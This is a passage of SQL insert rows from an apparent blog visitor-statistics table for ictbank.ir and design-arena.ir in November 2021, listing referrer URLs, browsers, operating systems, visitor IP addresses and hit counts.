(15066,'2021-11-13','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(15067,'2021-11-13','http://ictbank.ir/blog','Chrome','Android','6.0',NULL,NULL,'','121.5.109.55','000',0,1,0),
(15068,'2021-11-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','81.7.10.109','000',0,3,0),
(15069,'2021-11-13','http://ictbank.ir/blog','Firefox','Windows','6.2',NULL,NULL,'','193.239.84.219','000',0,2,0),
(15070,'2021-11-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.211.167.21','000',0,2,0),
(15071,'2021-11-13','https://www.google.com/','Firefox','Windows','6.3',NULL,NULL,'','217.63.69.81','000',0,1,0),
(15072,'2021-11-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.209.242','000',0,2,0),
(15073,'2021-11-13','http://design-arena.ir/blog/','Chrome','Windows','6.3',NULL,NULL,'','46.161.11.11','000',0,2,0),
(15074,'2021-11-13','http://ictbank.ir/blog','Firefox','Windows','6.2',NULL,NULL,'','89.44.9.177','000',0,1,0),
(15075,'2021-11-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.25.0.82','000',0,1,0),
(15076,'2021-11-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(15077,'2021-11-13','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.170','000',0,1,0),
(15078,'2021-11-13','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.171.142.36','000',0,1,0),
(15079,'2021-11-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.9.73.67','000',0,2,0),
(15080,'2021-11-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.221.8','000',0,1,0),
(15081,'2021-11-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(15082,'2021-11-13','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,2,0),
(15083,'2021-11-13','http://mail.design-arena.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.218.247.25','000',0,1,0),
(15084,'2021-11-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,1,0),
(15085,'2021-11-13','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,1,0),
(15086,'2021-11-13','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.162.103.109','000',0,2,0),
(15087,'2021-11-13','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.134.134','000',0,2,0),
(15088,'2021-11-14','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,4,0),
(15089,'2021-11-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,1,0),
(15090,'2021-11-14','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,1,0),
(15091,'2021-11-14','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(15092,'2021-11-14','http://ictbank.ir/','Chrome','Windows','6.1',NULL,NULL,'','141.95.33.140','000',0,1,0),
(15093,'2021-11-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.187.39.243','000',0,2,0),
(15094,'2021-11-14','http://design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.13','000',0,2,0),
(15095,'2021-11-14','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.53.90.24','000',0,2,0),
(15096,'2021-11-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.158.119.111','000',0,1,0),
(15097,'2021-11-14','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.18.213','000',0,1,0),
(15098,'2021-11-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','172.245.58.102','000',0,2,0),
(15099,'2021-11-14','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','144.168.225.123','000',0,11,0),
(15100,'2021-11-14','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','198.46.170.103','000',0,2,0),
(15101,'2021-11-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','93.90.146.101','000',0,1,0),
(15102,'2021-11-14','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.244.173.42','000',0,2,0),
(15103,'2021-11-14','http://ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.91.196','000',0,1,0),
(15104,'2021-11-14','http://ictbank.ir/blog','Chrome','Android','8.0.0',NULL,NULL,'','107.172.168.182','000',0,4,0),
(15105,'2021-11-14','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','107.173.92.136','000',0,2,0),
(15106,'2021-11-14','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','107.172.246.67','000',0,12,0),
(15107,'2021-11-14','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','5.157.33.180','000',0,2,0),
(15108,'2021-11-15','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,2,0),
(15109,'2021-11-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','132.145.38.100','000',0,1,0),
(15110,'2021-11-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.53.90.24','000',0,3,0),
(15111,'2021-11-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','148.251.234.104','000',0,1,0),
(15112,'2021-11-15','http://82.102.9.14:80/blog','Unknown','Unknown','Unknown',NULL,NULL,'','60.217.75.69','000',0,1,0),
(15113,'2021-11-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.188.131.42','000',0,2,0),
(15114,'2021-11-15','http://ictbank.ir/blog','Firefox','OS X','10.14',NULL,NULL,'','185.191.34.215','000',0,1,0),
(15115,'2021-11-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','139.162.215.70','000',0,3,0),
(15116,'2021-11-15','http://ictbank.ir/blog','Firefox','Windows','5.1',NULL,NULL,'','181.238.96.15','000',0,2,0),
(15117,'2021-11-15','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','93.158.92.219','000',0,2,0),
(15118,'2021-11-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.178.191.107','000',0,1,0),
(15119,'2021-11-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.86.15.141','000',0,1,0),
(15120,'2021-11-15','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','182.180.160.200','000',0,1,0),
(15121,'2021-11-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.236.173.81','000',0,1,0),
(15122,'2021-11-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,2,0),
(15123,'2021-11-15','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','82.117.194.229','000',0,2,0),
(15124,'2021-11-15','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.202','000',0,2,0),
(15125,'2021-11-15','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(15126,'2021-11-15','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.233.83.26','000',0,2,0),
(15127,'2021-11-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.122.50.185','000',0,1,0),
(15128,'2021-11-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','134.209.87.86','000',0,1,0),
(15129,'2021-11-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(15130,'2021-11-15','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(15131,'2021-11-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.161.15.95','000',0,1,0),
(15132,'2021-11-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','51.161.84.56','000',0,1,0),
(15133,'2021-11-15','http://ictbank.ir/blog','Internet Explorer','Windows','3.1',NULL,NULL,'','212.102.35.151','000',0,2,0),
(15134,'2021-11-15','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.219','000',0,2,0),
(15135,'2021-11-15','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.128.226.229','000',0,2,0),
(15136,'2021-11-16','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(15137,'2021-11-16','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,6,0),
(15138,'2021-11-16','https://webtechsurvey.com/website/ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','23.229.104.2','000',0,3,0),
(15139,'2021-11-16','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','185.164.59.114','000',0,12,0),
(15140,'2021-11-16','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','23.231.15.48','000',0,2,0),
(15141,'2021-11-16','design-arena.ir','Chrome','Windows','6.0',NULL,NULL,'','212.83.147.15','000',0,3,0),
(15142,'2021-11-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','165.140.216.17','000',0,1,0),
(15143,'2021-11-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','192.162.103.109','000',0,2,0),
(15144,'2021-11-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.221','000',0,2,0),
(15145,'2021-11-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','208.109.26.191','000',0,1,0),
(15146,'2021-11-16','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','131.108.209.118','000',0,2,0),
(15147,'2021-11-16','http://ictbank.ir/blog/','Firefox','Windows','10.0',NULL,NULL,'','18.223.247.235','000',0,3,0),
(15148,'2021-11-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.214.117.203','000',0,2,0),
(15149,'2021-11-16','ictbank.ir','Chrome','Windows','6.0',NULL,NULL,'','37.187.132.112','000',0,1,0),
(15150,'2021-11-16','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','192.3.205.199','000',0,2,0),
(15151,'2021-11-16','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.189.84.202','000',0,1,0),
(15152,'2021-11-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.141.127','000',0,1,0),
(15153,'2021-11-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','68.183.12.129','000',0,1,0),
(15154,'2021-11-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(15155,'2021-11-16','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(15156,'2021-11-16','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','185.180.231.247','000',0,2,0),
(15157,'2021-11-16','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.124.84.181','000',0,2,0),
(15158,'2021-11-16','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.173','000',0,1,0),
(15159,'2021-11-17','http://www.ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','111.7.100.19','000',0,3,0),
(15160,'2021-11-17','http://ictbank.ir/blog','Chrome','OS X','Unknown',NULL,NULL,'','111.7.100.18','000',0,2,0),
(15161,'2021-11-17','http://mail.design-arena.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.50','000',0,2,0),
(15162,'2021-11-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.53.90.24','000',0,2,0),
(15163,'2021-11-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','192.53.170.243','000',0,2,0),
(15164,'2021-11-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.124.84.181','000',0,1,0),
(15165,'2021-11-17','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','107.175.13.213','000',0,13,0),
(15166,'2021-11-17','http://www.ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','45.252.189.131','000',0,2,0),
(15167,'2021-11-17','http://ictbank.ir/blog','Vivaldi','Windows','10.0',NULL,NULL,'','185.205.198.121','000',0,9,0),
(15168,'2021-11-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,3,0),
(15169,'2021-11-17','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','80.82.77.192','000',0,2,0),
(15170,'2021-11-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.195.96','000',0,2,0),
(15171,'2021-11-17','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.171','000',0,1,0),
(15172,'2021-11-17','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,2,0),
(15173,'2021-11-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','54.201.97.60','000',0,1,0),
(15174,'2021-11-17','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','107.174.166.136','000',0,1,0),
(15175,'2021-11-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.44.57','000',0,1,0),
(15176,'2021-11-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(15177,'2021-11-17','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,2,0),
(15178,'2021-11-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,2,0),
(15179,'2021-11-17','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','80.82.77.139','000',0,2,0),
(15180,'2021-11-17','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','62.210.88.24','000',0,10,0),
(15181,'2021-11-17','http://design-arena.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.122','000',0,1,0),
(15182,'2021-11-17','http://design-arena.ir/blog/','Chrome','OS X','10.13.6',NULL,NULL,'','130.255.166.24','000',0,1,0),
(15183,'2021-11-17','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,1,0),
(15184,'2021-11-17','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(15185,'2021-11-18','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','162.241.24.56','000',0,1,0),
(15186,'2021-11-18','http://ictbank.ir/blog','Firefox Mobile','Android','11',NULL,NULL,'','118.148.82.251','000',0,1,0),
(15187,'2021-11-18','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(15188,'2021-11-18','http://www.ictbank.ir/blog','Chrome','OS X','10.13.6',NULL,NULL,'','192.99.18.136','000',0,1,0),
(15189,'2021-11-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,1,0),
(15190,'2021-11-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.146','000',0,1,0),
(15191,'2021-11-18','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,8,0),
(15192,'2021-11-18','https://www.bing.com','Chrome','Linux','Unknown',NULL,NULL,'','167.99.8.211','000',0,1,0),
(15193,'2021-11-18','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','147.78.141.191','000',0,5,0),
(15194,'2021-11-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','193.118.53.194','000',0,2,0),
(15195,'2021-11-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','35.85.136.39','000',0,2,0),
(15196,'2021-11-18','http://ictbank.ir/blog','Firefox','Linux','Unknown',NULL,NULL,'','203.86.199.139','000',0,1,0),
(15197,'2021-11-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','18.237.101.228','000',0,1,0),
(15198,'2021-11-18','http://ictbank.ir/blog','Chrome','Windows','6.1',NULL,NULL,'','198.20.69.98','000',0,2,0),
(15199,'2021-11-18','http://ictbank.ir/blog','Chrome','OS X','10.11.6',NULL,NULL,'','60.191.125.35','000',0,1,0),
(15200,'2021-11-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','123.163.114.165','000',0,1,0),
(15201,'2021-11-18','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','212.71.237.238','000',0,2,0),
(15202,'2021-11-18','http://82.102.9.14:80/blog','Firefox','Windows','10.0',NULL,NULL,'','45.83.65.152','000',0,1,0),
(15203,'2021-11-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.32.103.213','000',0,1,0),
(15204,'2021-11-18','http://ictbank.ir/blog','Internet Explorer','Windows','5.1',NULL,NULL,'','89.218.45.242','000',0,1,0),
(15205,'2021-11-18','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','52.188.5.14','000',0,4,0),
(15206,'2021-11-18','http://ictbank.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','146.185.195.11','000',0,2,0),
(15207,'2021-11-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','165.22.120.64','000',0,1,0),
(15208,'2021-11-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','45.76.44.57','000',0,1,0),
(15209,'2021-11-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.47.202','000',0,1,0),
(15210,'2021-11-18','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.163.106','000',0,1,0),
(15211,'2021-11-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','68.183.196.136','000',0,2,0),
(15212,'2021-11-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','139.162.215.70','000',0,2,0),
(15213,'2021-11-18','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.1.248.42','000',0,2,0),
(15214,'2021-11-18','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','104.250.194.229','000',0,2,0),
(15215,'2021-11-19','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','23.81.234.20','000',0,5,0),
(15216,'2021-11-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.141.34','000',0,2,0),
(15217,'2021-11-19','https://www.bing.com','Chrome','Windows','6.1',NULL,NULL,'','161.35.150.31','000',0,20,0),
(15218,'2021-11-19','http://ictbank.ir/blog/','Chrome','Windows','6.1',NULL,NULL,'','31.171.152.136','000',0,2,0),
(15219,'2021-11-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.137','000',0,2,0),
(15220,'2021-11-19','http://ictbank.ir/blog','Firefox','Windows','6.1',NULL,NULL,'','139.162.200.114','000',0,2,0),
(15221,'2021-11-19','http://ictbank.ir/blog','Chrome','OS X','10.7.5',NULL,NULL,'','185.31.175.215','000',0,1,0),
(15222,'2021-11-19','http://ictbank.ir/blog','Chrome','OS X','10.7.5',NULL,NULL,'','45.142.214.89','000',0,1,0),
(15223,'2021-11-19','http://82.102.9.14:80/blog','Firefox','OS X','10.14',NULL,NULL,'','128.199.255.158','000',0,2,0),
(15224,'2021-11-19','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,4,0),
(15225,'2021-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.219.81.95','000',0,2,0),
(15226,'2021-11-19','http://design-arena.ir/blog','Firefox','Ubuntu','Unknown',NULL,NULL,'','100.21.218.158','000',0,3,0),
(15227,'2021-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','18.218.106.170','000',0,1,0),
(15228,'2021-11-19','http://ictbank.ir/blog','Chrome','OS X','10.15.7',NULL,NULL,'','5.236.130.244','000',0,4,0),
(15229,'2021-11-19','http://ictbank.ir','Chrome','Windows','10.0',NULL,NULL,'','37.46.121.225','000',0,5,0),
(15230,'2021-11-19','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','34.221.148.151','000',0,1,0),
(15231,'2021-11-19','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.222','000',0,1,0),
(15232,'2021-11-19','http://ictbank.ir/blog','Chrome','OS X','10.9.3',NULL,NULL,'','45.129.18.19','000',0,1,0),
(15233,'2021-11-19','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','148.66.146.32','000',0,1,0),
(15234,'2021-11-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,1,0),
(15235,'2021-11-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','140.82.55.215','000',0,1,0),
(15236,'2021-11-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','192.248.169.62','000',0,1,0),
(15237,'2021-11-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','142.93.44.71','000',0,1,0),
(15238,'2021-11-19','http://ictbank.ir/blog/','Chrome','Windows','10.0',NULL,NULL,'','178.62.20.78','000',0,1,0),
(15239,'2021-11-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','164.52.24.179','000',0,1,0),
(15240,'2021-11-19','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,1,0),
(15241,'2021-11-19','https://www.google.com/','Firefox','Windows','10.0',NULL,NULL,'','213.109.199.206','000',0,1,0),
(15242,'2021-11-19','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.233.83.26','000',0,4,0),
(15243,'2021-11-19','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','192.53.170.243','000',0,2,0),
(15244,'2021-11-19','http://design-arena.ir/blog','Edge','Windows','10.0',NULL,NULL,'','2.57.122.50','000',0,9,0),
(15245,'2021-11-19','http://82.102.9.14/blog','Chrome','Windows','5.1',NULL,NULL,'','180.149.125.164','000',0,1,0),
(15246,'2021-11-20','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','45.158.15.145','000',0,2,0),
(15247,'2021-11-20','http://ictbank.ir/blog','Chrome','Linux','Unknown',NULL,NULL,'','62.210.215.118','000',0,6,0),
(15248,'2021-11-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','128.14.133.58','000',0,2,0),
(15249,'2021-11-20','http://ictbank.ir/blog','Firefox','Windows','10.0',NULL,NULL,'','185.233.83.26','000',0,2,0),
(15250,'2021-11-20','http://82.102.9.14/blog','Chrome','Windows','10.0',NULL,NULL,'','185.180.143.138','000',0,2,0),
(15251,'2021-11-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.43.230.226','000',0,2,0),
(15252,'2021-11-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','89.43.88.53','000',0,1,0),
(15253,'2021-11-20','http://ictbank.ir/blog','Unknown','Unknown','Unknown',NULL,NULL,'','43.242.215.216','000',0,2,0),
(15254,'2021-11-20','https://www.google.com/','Samsung Internet','Android','7.0',NULL,NULL,'','91.133.241.244','000',0,1,0),
(15255,'2021-11-20','https://www.google.com/','Firefox','Fedora','Unknown',NULL,NULL,'','5.249.44.53','000',0,1,0),
(15256,'2021-11-20','http://ictbank.ir/blog','Chrome','Windows','10.0',NULL,NULL,'','52.26.239.115','000',0,1,0),
(15257,'2021-11-20','https://www.google.com/','Chrome','Windows','10.0',NULL,NULL,'','27.34.68.172','000',0,1,0),
(15258,'2021-11-20','http://82.102.9.14:80/blog','Chrome','Windows','10.0',NULL,NULL,'','45.146.164.110','000',0,4,0),
(15259,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.223.0.64','000',0,1,0),
(15260,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.254.61','000',0,1,0),
(15261,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.134.243.88','000',0,1,0),
(15262,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.36.117','000',0,2,0),
(15263,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.221.210.186','000',0,1,0),
(15264,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.220.167.106','000',0,1,0),
(15265,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.188.193.37','000',0,1,0),
(15266,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.142.48.11','000',0,1,0),
(15267,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.225.11.190','000',0,1,0),
(15268,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.161.240','000',0,1,0),
(15269,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.20.239.248','000',0,1,0),
(15270,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.174.3','000',0,1,0),
(15271,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.219.32.121','000',0,1,0),
(15272,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.225.32.34','000',0,1,0),
(15273,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.141.18.63','000',0,1,0),
(15274,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.136.85.238','000',0,1,0),
(15275,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.189.13.193','000',0,1,0),
(15276,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.222.74.89','000',0,1,0),
(15277,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.132.100','000',0,1,0),
(15278,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.14.65.30','000',0,2,0),
(15279,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','13.59.204.85','000',0,2,0),
(15280,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.136.220','000',0,1,0),
(15281,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.139.64.234','000',0,1,0),
(15282,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.191.187.42','000',0,1,0),
(15283,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.185.142','000',0,1,0),
(15284,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.144.79.221','000',0,1,0),
(15285,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.192.177','000',0,1,0),
(15286,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','18.217.120.154','000',0,1,0),
(15287,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.128.29.53','000',0,1,0),
(15288,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.144.73.91','000',0,1,0),
(15289,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.137.141.17','000',0,1,0),
(15290,'2021-11-20','http://ictbank.ir/blog/wp-login.php','Firefox','Windows','10.0',NULL,NULL,'','3.17.128.40','000',0,1,0),
